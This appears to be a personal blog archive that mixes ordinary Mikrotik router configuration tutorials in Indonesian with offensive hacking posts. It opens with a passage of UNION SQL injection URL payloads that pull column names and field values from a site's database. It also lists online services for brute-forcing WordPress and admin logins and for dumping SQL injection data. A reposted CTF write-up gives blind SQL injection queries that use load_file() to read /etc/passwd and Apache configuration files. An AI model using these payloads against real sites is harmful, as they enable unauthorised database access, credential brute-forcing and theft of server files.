http://[site]/page.asp?id=1 UNION SELECT ALL 1,column_name,3,4 from DBNAME.information_schema.columns where table_name=’TABLE-NAME-1‘–[COLUMN NAME 1]

UNION SQL INJECTION – EXTRACT 1st FIELD

http://[site]/page.asp?id=1 UNION SELECT ALL 1,COLUMN-NAME-1,3,4 from TABLE-NAME-1–[FIELD 1 VALUE]

UNION SQL INJECTION – EXTRACT 2nd FIELD

http://[site]/page.asp?id=1 UNION SELECT ALL 1,COLUMN-NAME-2,3,4 from TABLE-NAME-1– [FIELD 2 VALUE]

UNION SQL INJECTION – EXTRACT 3nd FIELD
	http://[site]/page.asp?id=1 UNION SELECT ALL 1,COLUMN-NAME-3,3,4 from TABLE-NAME-1–[FIELD 3 VALUE]

Membuat Mikrotik Firewall dengan Logika Simple Mode

23 Dec 2011 Leave a Comment

by Andi Wijaya in Mikrotik Tags: mikrotik

Penulis Artikel : Nathan Gusti Ryan

Berikut ini saya sharing Step by Step membuat konfigurasi Firewall Mikrotik dengan cara yang simple dan logis sehingga bisa lebih mudah di pahami karena lebih “Manusiawi”…

Kita awali dengan tampilan Mikrotik Winbox yang mana semua konfigurasi IP Address, Setting NAT, Setting IP Route dan Setting IP DNS sudah benar dan Mikrotik dapat berfungsi dengan baik.

1. Mem-block suatu IP Address Client agar tidak dapat mengakses internet.

Buat sebuah Firewall Rule :

Chain = Forward
Src Address = 192.168.10.10
Out Interface = WAN.

Action = Drop.

Maka PC Client 192.168.10.10 tidak akan dapat mengakses internet.

2. Mem-block suatu MAC Address suatu Client agar tidak dapat mengakses internet.

Buat sebuah Firewall Rule :

Chain = Forward
Out Interface = WAN.

ADVANCED : Mac Address = 00:1F:3C:66:E6:A6

Action = Drop.

Maka PC Client dengan MAC Addres : 00:1F:3C:66:E6:A6 tidak akan dapat mengakses internet.

3. Mem-block suatu Websites agar tidak dapat diakses oleh PC Client kita. ( Contohnya : websites Playboy.com )

Buat sebuah Firewall Rule :

Chain = Forward.
Out Interface = WAN.

Dst Address = 202.134.0.135 ( bisa di lihat dengan ping ke websites playboy.com ).

Action = Drop.

Maka PC Client tidak akan dapat mengakses websites playboy.com.

4. Mem-block sejumlah Client dengan Group Address List agar tidak dapat mengakses internet.

Buat sebuah Firewall Rule :

Buat Group di menu Firewall > Address List. ( misalnya dengan nama LAN-BLOCKED ).
Chain = Forward.
Out Interface = WAN.

ADVANCED : Src Address List = LAN-BLOCKED.

Action = Drop.

Maka PC Client yang sudah terdaftar pada Group LAN-BLOCKED tidak akan dapat mengakses internet.

5. Mem-block suatu Websites yang memiliki sejumlah IP Public maupun sejumlah Websites yang di larang untuk diakses Client agar PC Client di jaringan kita tidak dapat mengakses websites tersebut. (Contohnya : websites Facebook.com )

Buat sebuah Firewall Rule :

Buat Group di menu Firewall > Address List. Misalnya dengan nama FACEBOOK. ( bisa di lihat dengan ping ke websites facebook.com )
Buat Group di menu Firewall > Address List. ( misalnya dengan nama LAN-FILTERED ).

Chain = Forward.
Out Interface = WAN.

ADVANCED : Src Address List = LAN-FILTERED .
ADVANCED : Dst Address List = FACEBOOK .

Action = Drop.

Maka PC Client yang ada dalam Group LAN-FILTERED tidak akan dapat mengakses websites dengan IP Address yang sudah kita register pada Group FACEBOOK ( sesuai IP Address yang ada di menu Address List ).

6. Mem-block / mem-BlackList sejumlah IP Address Public yang teridentifikasi menganggu Mikrotik kita.

Buat sebuah Firewall Rule :

Buat Group di menu Firewall > Address List. Misalnya dengan nama BLACK-HACKER. ( bisa di lihat dengan mengakses menu LOG ).

Chain = Forward.
IN Interface = WAN.

ADVANCED : Src Address List = BLACK-HACKER.

Action = Drop.

7. Okey, kita sudah berhasil membuat sejumlah Filtering Firewall.

Mudah sekali bukan???

Next Articles akan mengangkat artikel TIPS & TRICK Firewalling seperti saat ini lebih lanjut.

Selamat mencoba…

Step by Step Installasi Router Mikrotik dgn ADSL Speedy

23 Dec 2011 Leave a Comment

by Andi Wijaya in Mikrotik Tags: mikrotik

Penulis Artikel : Nathan Gusti Ryan

Mikrotik, sesuai dengan visinya yaitu ROUTING THE WORLD, saat ini benar-benar telah diakui sebagai Router yang sangat handal dan sangat lengkap fiturnya serta sangat mudah konfigurasinya. Namun tidak sedikit dari penguna Mikrotik ini menanggalkan Mikrotik dan kembali ke jaringan NATURAL, bukan karena Mikrotiknya yang tidak handal atau Mikrotiknya yang “Bego”. Melainkan SDM mereka sendiri yang masih kurang dalam memahami dan mendalami fungsi serta teknis konfigurasi Mikrotik itu sendiri. So… belajarlah agar anda lebih expert menguasai Mikrotik ini. Termasuk rekan-rekan yang ingin profesional di bidang IT Networking System, kerja di ISP maupun di Telco. Siapkan Skill anda dengan keahlianMikrotik Administrator yang handal, bukan sekedar bisa tapi harus benar-benar Expert…

Karena itulah, berbekal pengalaman dalam mengunakan Mikrotik sejak tahun 2005 hingga 2010 inilah saya membuat Buku Materi Training Mikrotik Bandwith Manajemen dan Mikrotik VPN Server – Client, dalam kurun waktu 5 bulan ( November 2009 – Februari 2011 ) telah membuat > 30 kelas Training dengan jumlah peserta > 500 orang ( baik kelasReguler / umum maupun kelas Private / Inhouse Training ). Training ini bukan untuk Profit Oriented tapi bersifat sharing ilmu dan pengalaman bagi rekan-rekan sesama IT, Mahasiswa dan Komunitas.

Melakukan Installasi Mikrotik PC Router atau melakukan konfigurasi Mikrotik RouterBoard, bukanlah hal yang sulit ( jika benar2 paham basic konsep & teknisnya ) tapi juga bukanlah hal yang mudah ( bagi anda newbie Mikrotik dan bagi anda yang asal / sembarangan setting tanpa benar2 memahami cara kerja Mikrotik dengan seksama ).

Mengunakan koneksi Speedy dengan Router Mikrotik ada 2 macam cara, yaitu :

1. Modem ADSL di setting sebagai PPPoE, lalu username & password Speedy di input pada Modem, sehingga setelah terkoneksi ke Speedy maka IP Public berada pada Modem ADSL ini. Pada option ini Mikrotik hanya berfungsi sebagai BANDWITH MANAJEMEN saja serta berbagai fitur lain, namun hanya untuk layanan LOKAL.

2. Modem ADSL di setting sebagai BRIDGE, lalu username & password Speedy di input pada Mikrotik( PPPoE Client ), sehingga setelah terkoneksi ke Speedy maka IP Public berada pada Mikrotik. Pada option ini Mikrotik bukan hanya berfungsi sebagai BANDWITH MANAJEMENnamun berbagai fitur lain dapat difungsikan untuk berbagai layanan PUBLIC. Seperti VPN Server / Client, FTP Server, Web Server, dll.

Sebelum memulai konfigurasi, berikut ini Topologi Jaringan yang akan kita bangun. Modem ADSL kita setting sebagai Bridge ( Mode Bridge, bukan PPPoe ). IP Address yang digunakan juga bebas sesuai dengan jaringan di tempat anda. Sekali lagi bahwa jika kita memahami konsep Mikrotik dengan benar maka kita bikin Router untuk koneksi apa saja atau mengunakan IP Address berapa saja akan terasa mudah dan PASTI SUKSES…

0 : Bahan-bahan yang harus disiapkan untuk membuat Mikrotik PC Router adalah sebuah PC Jangkrik – setidaknya Pentium II/400 Mhz, harddisk minimal 1 GB, Ram 64 MB / 128 MB, 2 buah PCI LAN Card ( Merk Intel / Realtek / DLink / 3 Com / TPLink / dll ), CDRom, CD Installer Mikrotik, kabel UTP secukupnya serta sebuah Modem ADSL yang support BRIDGE MODE.

1 : IP Address ADSL Modem : 192.168.1.1

2 : IP Address interface Mikrotik ke ADSL Modem : 192.168.1.10 ( harus 1 segmen dengan IP Address Modem ). Walaupun sebenarnya kita bisa saja TIDAK memberi IP Address pada interface ini karena Dial Up PPPoE akan secara otomatis mencari Modem Bridge, tapi pemberian IP Address untuk Interface ini akan memberi kemudahan untuk pengecekan koneksi / ping ke Modem ADSL.

3 : IP Address interface Mikrotik ke Switch / Hub / Client : 192.168.88.251 ( kebetulan saja saya gunakan IP ini, yang penting harus 1 Segmen dengan IP Address PC Client kita yang lain ). Perhatikan dan pahami gambar dibawah ini :

Setelah pada tahap persiapan dengan memahai konsep dan topologi Jaringan Mikrotik yang akan kita bangun, maka cara memasaknya adalah sebagai berikut :

Langkah Pertamax adalah melakukan setting Modem ADSL sebagai Bridge :

Kedua : Siapkan sebuah PC dengan 2 buah LAN Card dan di Install Mikrotik.

Ketiga : Setelah Installasi selesai, Reboot PC Router kita lalu akses ke Mikrotik denganWinbox. Selanjutnya kedua Interface kita ganti nama menjadi LAN dan SPEEDY. Tujuannya adalah untuk memudahkan identifikasi kita sehingga tidak terjadi salah setting interface.

Keempat : Setting IP Address untuk LAN : 192.168.88.251/24 dan IP Addess interfaceSpeedy : 192.168.10/24.

Kelima : Selanjutnya kita setting IP DNS dengan IP DNS Speedy : 202.134.1.10 dan202.134.0.155. Caranya masuk ke menu “IP” lalu pilih “DNS“.

Keenam : Langkah selanjutnya adalah membuat Interface PPPoE Client. Caranya klik menu Interface, pada simbol plus kita klik dan pilih “PPPoE Client”. Disini kita juga memasukkan Username dan Password Speedy yang telah kita punya.

Pada Option “General“, cukup menentukan interface yang 1 jalur dengan Modem ADSL. Untuk nama dan type-nya pake default-nya saja sudah cukup.

Jangan lupa untuk menentukan Interface yang mengarah ke modem ADSL, yaitu interface yang telah kita beri nama “SPEEDY“. Lalu selanjutnya klik tab “Dial Out” dan masukkanUsername + Password Account Speedy kita.

Selain melalui Winbox, kita juga bisa memasukkan Username dan Password Speedy ini lewatWebBox.

Ketujuh : Apabila kita telah selesai melakukan setting PPPoE Client maka begitu selesai setting Mikrotik langsung melakukan DialUp ke Modem ADSL kita. Jika setting Username dan Password ini benar maka selanjutnya akan tampak status koneksi Mikrotik kita dan pada menu IP -> Address akan muncul sebuat IP Address baru berupa IP Public (125.164.75.150 ) yang diberikan Telkom Speedy kepada pelanggan berdasarkan Username & Password yang kita miliki.

Kedelapan : Selanjutnya kita atur NAT ( Network Address Translation ) agar Client dapat terkoneksi ke Internet atau dapat mengakses internet. Caranya masuk ke menu -> IP -> Firewall -> NAT ( seperti gambar dibawah ini ).

Kesembilan : Kita buat 1 buah NAT Rule, pada “General” -> Chain = srcnat, ->OutInterface = pppoe out1. Lalu pada option “Action” kita pilih -> Masquarade.

Selain setting dari Console atau dari Winbox, kita juga bisa melakukan setting NAT ini dariWebBox ( kalo menurut saya sich ini buat Newbie Mikrotik lebih mudah daripada setting dariWinbox ). Caranya : Pilih Public Interface = pppoe out1 lalu centang NAT trus klik “Apply“.

Kesepuluh : Selanjutnya kita tambahkan 1 buah IP Route. Perhatikan pada sebelah IP Address dari IP Public dibawah ini yaitu : Network = 125.164.72.1. Nah, IP Network ini adalah IP Gateway Telkom Speedy yang melayani koneksi kita. Tambahkan 1 buah New Route, Destination : 0.0.0.0/0 lalu Gateway = = 125.164.72.1.

Kesebelas : Sampai sini setting Mikrotik Router kita telah selesai. Tinggal test ping koneksi dari Mikrotik kita. Lakukan test ke IP DNS Speedy : 202.134.1.0 dilanjutkan test ping ke yahoo.com maupun ke websites yang lain. Jika ada reply maka Mikrotik kita telah berhasil / telah sukses kita konfigurasi.

Keduabelas : Langkah ini kita lakukan pada PC Client. IP Mikrotik interface ke LAN merupakan IP Gateway untuk PC Client kita. IP DNS pada Client dapat kita masukkan IP DNS Speedy secara langsung maupun IP DNS dari Mikrotik ( karena kita telah setting Mikrotik menjadi DNS Relay pada langkah kelima dari tutorial ini ).

~~~~~~~~~~~~~~~~~~

Okey, sampai sini Mikrotik kita telah berfungsi sebagai Router dan sharing akses internet untuk semua Client yang lain telah dapat difungsikan. Nah, tahap selanjutnya yang harus kita lakukan adalah Bandwith Manajemen atau mengatur bandwith yang tepat untuk semua Client sehingga jika ada Client yang melakukan download mengunakan software Downloader dapat di kendalikan atau di kontrol sehingga bandwith kita tidak dihabiskannya sendiri dan akses internet client yang lain tidak menjadi lemot.

http://thinkxfree.wordpress.com/2010/04/16/step-by-step-installasi-router-mikrotik-dgn-adsl-speedy/

Online Scan

12 Nov 2011 3 Comments

by Andi Wijaya in hacking

Online Port Scanner

http://scan.subhashdasyam.com/port-scanner.php

Online VNC Scanner

http://scan.subhashdasyam.com/dumper-with-login.php

Online SSH Scanner

http://scan.subhashdasyam.com/ssh-scanner.php

Online Admin Page Bruter

http://scan.subhashdasyam.com/admin-page-finder.php

Online WordPress Admin/Password Bruter

http://scan.subhashdasyam.com/wordpress-bruter.php

Online LFI Scanner

http://scan.subhashdasyam.com/lfi-scanner.php

Online RDP Scanner

http://scan.subhashdasyam.com/remote-desktop-scanner.php

Fastest Online SQL Injection Values Dumper

http://scan.subhashdasyam.com/dumper.php

Fastest Online SQL Injection Values Dumper(Supports Login)

http://scan.subhashdasyam.com/dumper-with-login.php

Blind SQL injection with load_file()

15 Sep 2011 Leave a Comment

by Andi Wijaya in SQL Injection

Currently I am working a lot on RIPS but here is a small blogpost about a technique I thought about lately and wanted to share.
While participating at the smpCTF I came across a blind SQL injection in level 2. After solving the challenge I checked for the FILE privilege:

/level2/?id=1/**/and/**/(SELECT/**/is_grantable/**/FROM/**/information_schema.user_privileges/**/WHERE/**/privilege_type=0x66696C65/**/AND/**/grantee/**/like/**/0x25726F6F7425/**/limit/**/1)=0×59

Luckily the FILE privilege was granted which was not intended by the organizer. Since I had not solved level 1 at that time I thought it would be easier to read the PHP files to solve level 1. First I checked if reading files with load_file() worked at all and tried to read /etc/passwd:

/level2/?id=1/**/and/**/!isnull(load_file(2F6574632F706173737764))

Since the webpage with id=1 was displayed the and condition must have been evaluated to true which means that the file could be read (load_file() returns null if the file can not be read). Before reading the PHP files I needed to find the webserver configuration file to find out where the DocumentRoot was configured. I used the same query as above to check for the existence of the following apache config files:

$paths = array(
“/etc/passwd”,
“/etc/init.d/apache/httpd.conf”,
“/etc/init.d/apache2/httpd.conf”,
“/etc/httpd/httpd.conf”,
“/etc/httpd/conf/httpd.conf”,
“/etc/apache/apache.conf”,
“/etc/apache/httpd.conf”,
“/etc/apache2/apache2.conf”,
“/etc/apache2/httpd.conf”,
“/usr/local/apache2/conf/httpd.conf”,
“/usr/local/apache/conf/httpd.conf”,
“/opt/apache/conf/httpd.conf”,
“/home/apache/httpd.conf”,
“/home/apache/conf/httpd.conf”,
“/etc/apache2/sites-available/default”,
“/etc/apache2/vhosts.d/default_vhost.include”);

update: There is an official list for Apache. Very useful.

Webpage with id=1 was displayed for the file /etc/httpd/httpd.conf thus revealing that this file existed and could be read.

Now it was time for the tricky part: I had only a true/false blind SQL injection which means that I could only bruteforce the configuration file char by char. Since the length of the file was more than 10000 chars this would have taken way too long.
I decided to give little shots at the configuration file trying to hit the DocumentRoot setting or a comment nearby that identifies my current position. Each shot bruteforced 10 alphanumerical characters:

/level2/?id=1/**/and/**/mid(lower(load_file(0x2F6574632F68747470642F68747470642E636F6E66)),$k,1)=0x$char

I compared the few bruteforced characters to a known apache configuration file trying to map the characters to a common configuration comment. This worked for most of the character sequences but unfortunately almost every configuration file is a bit different so that it was not possible to calculate the correct offset of the DocumentRoot setting once another setting had been identified. I bruteforced only alphanumerical strings to save time. For example the bruteforced string “dulesthoselisted” could be mapped to the comment “modules (those listed by `httpd -l’)” and so on.
After the 10th shot I luckily hit the DocumentRoot setting comment at offset 7467 and after this it was possible to calculate the correct offset for the beginning of the DocumentRoot setting and I could retrieve “srvhttpdhtdocs” (DocumentRoot: /srv/httpd/htdocs/).

While that worked fine during the hectics of the CTF and was better than a bruteforce on the whole configuration file, I thought about it again yesterday and thought that this technique was plain stupid .

If you know what you are looking for in a file (and mostly you do) you can easily find the correct offset with LOCATE(substr,str[,pos]) which will return the offset of a given substring found in a string. The following query instantly returns the next 10 characters after the DocumentRoot setting:

substr(load_file(‘file’),locate(‘DocumentRoot’,(load_file(‘file’)))+length(‘DocumentRoot’),10)

and can then be bruteforced easily:

mid(lower(substr(load_file(‘file’),locate(‘DocumentRoot’,(load_file(‘file’)))+length(‘DocumentRoot’),10)),$k,1)=0x$char

No magic here, but a helpful combination of mysql build in functions when reading files blindly.

https://websec.wordpress.com/2010/10/01/blind-sql-injection-with-load_file/

	Hello world! \| sikuc… on Sql Injection Tutorial
	Hello world! \| sikuc… on Online Scan
	Hello world! \| sikuc… on Shell via LFI
	Hello world! \| sikuc… on About
	chupascz on Shell via LFI

Andi Wijaya

Upload shell php dengan Tamper Data

Mengatasi serangan NetCut, Mac Cloning, Conficker dan Spam menggunakan Mikrotik RouterOS

Microsoft SQL Error Exploit

Microsoft SQL Blind Exploit

DOM Based Cross Site Scripting

Microsoft SQL Union Exploit

Membuat Mikrotik Firewall dengan Logika Simple Mode

Step by Step Installasi Router Mikrotik dgn ADSL Speedy

Online Scan

Blind SQL injection with load_file()

Categories

Archives

Yu Agh

Blogroll

Follow “Andi Wijaya”